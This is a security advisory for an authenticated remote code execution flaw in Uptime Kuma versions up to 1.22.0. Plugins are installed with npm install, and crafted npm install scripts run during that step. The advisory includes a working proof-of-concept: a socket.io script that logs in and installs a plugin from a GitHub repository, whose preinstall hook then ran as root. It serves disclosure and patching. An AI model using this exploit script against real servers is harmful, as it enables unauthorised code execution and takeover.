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Authenticated remote code execution via malicious plugin installation

High
louislam published GHSA-7grx-f945-mj96 Jul 4, 2023

Package

docker louislam/uptime-kuma (Docker)

Affected versions

<= 1.22.0

Patched versions

1.22.1
npm louislam/uptime-kuma (npm)
<= 1.22.0
1.22.1

Description

Summary

Installation of a maliciously crafted plugin allows for remote code execution by an authenticated attacker.

Details

Uptime Kuma allows authenticated users to install plugins from an official list of plugins. This feature is currently disabled in the web interface, but the corresponding API endpoints are still available after login.
After downloading a plugin, it's installed by calling npm install in the installation directory of the plugin:

let result = childProcess.spawnSync("npm", [ "install" ], {
cwd: this.pluginDir,
env: {
...process.env,
PLAYWRIGHT_BROWSERS_PATH: "../../browsers", // Special handling for read-browser-monitor
}
});

Because the plugin is not validated against the official list of plugins or installed with npm install --ignore-scripts, a maliciously crafted plugin taking advantage of npm scripts can gain remote code execution.

PoC

In the PoC below, the plugin at https://github.com/n-thumann/npm-install-script-poc will be installed. It only consists of an empty index.js and a package.json containing the script: "preinstall": "echo \"Malicious code could have been executed as user $(whoami)\" > /tmp/poc". This will be executed when installing the plugin.

  1. Start Uptime Kuma: docker run -d -p 3001:3001 -v uptime-kuma:/app/data --name uptime-kuma louislam/uptime-kuma:1
  2. Create a user using the Uptime Kuma web interface, e.g. user admin with password admin123
  3. Confirm that the PoC file to be created doesn't exist yet:
➜  ~ docker exec -it uptime-kuma cat /tmp/poc
cat: /tmp/poc: No such file or directory
  1. Create file poc.js with the following content:
SERVER = "ws://localhost:3001";
USERNAME = "admin";
PASSWORD = "admin123";


const { io } = require("socket.io-client");
const socket = io(SERVER);
const repo = "https://github.com/n-thumann/npm-install-script-poc";
const name = "npm-install-script-poc";

socket.emit(
  "login",
  { username: USERNAME, password: PASSWORD, token: "" },
  (res) => {
    if (res.ok !== true) return console.log("Login failed");

    console.log("Login successful");
    socket.emit("installPlugin", repo, name, () => {
      console.log("Done");
      socket.close();
    });
  }
);
  1. Install socket.io-client: npm install socket.io-client
  2. Run the script: node poc.js:
# node poc.js
Login successful
Done
  1. The PoC file has been created:
➜  ~ docker exec -it uptime-kuma cat /tmp/poc
Malicious code could have been executed as user root

Impact

This vulnerability allows authenticated attacker to gain remote code execution on the server Uptime Kuma is running on.

Severity

High
8.8
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID

CVE-2023-36821

Weaknesses

Credits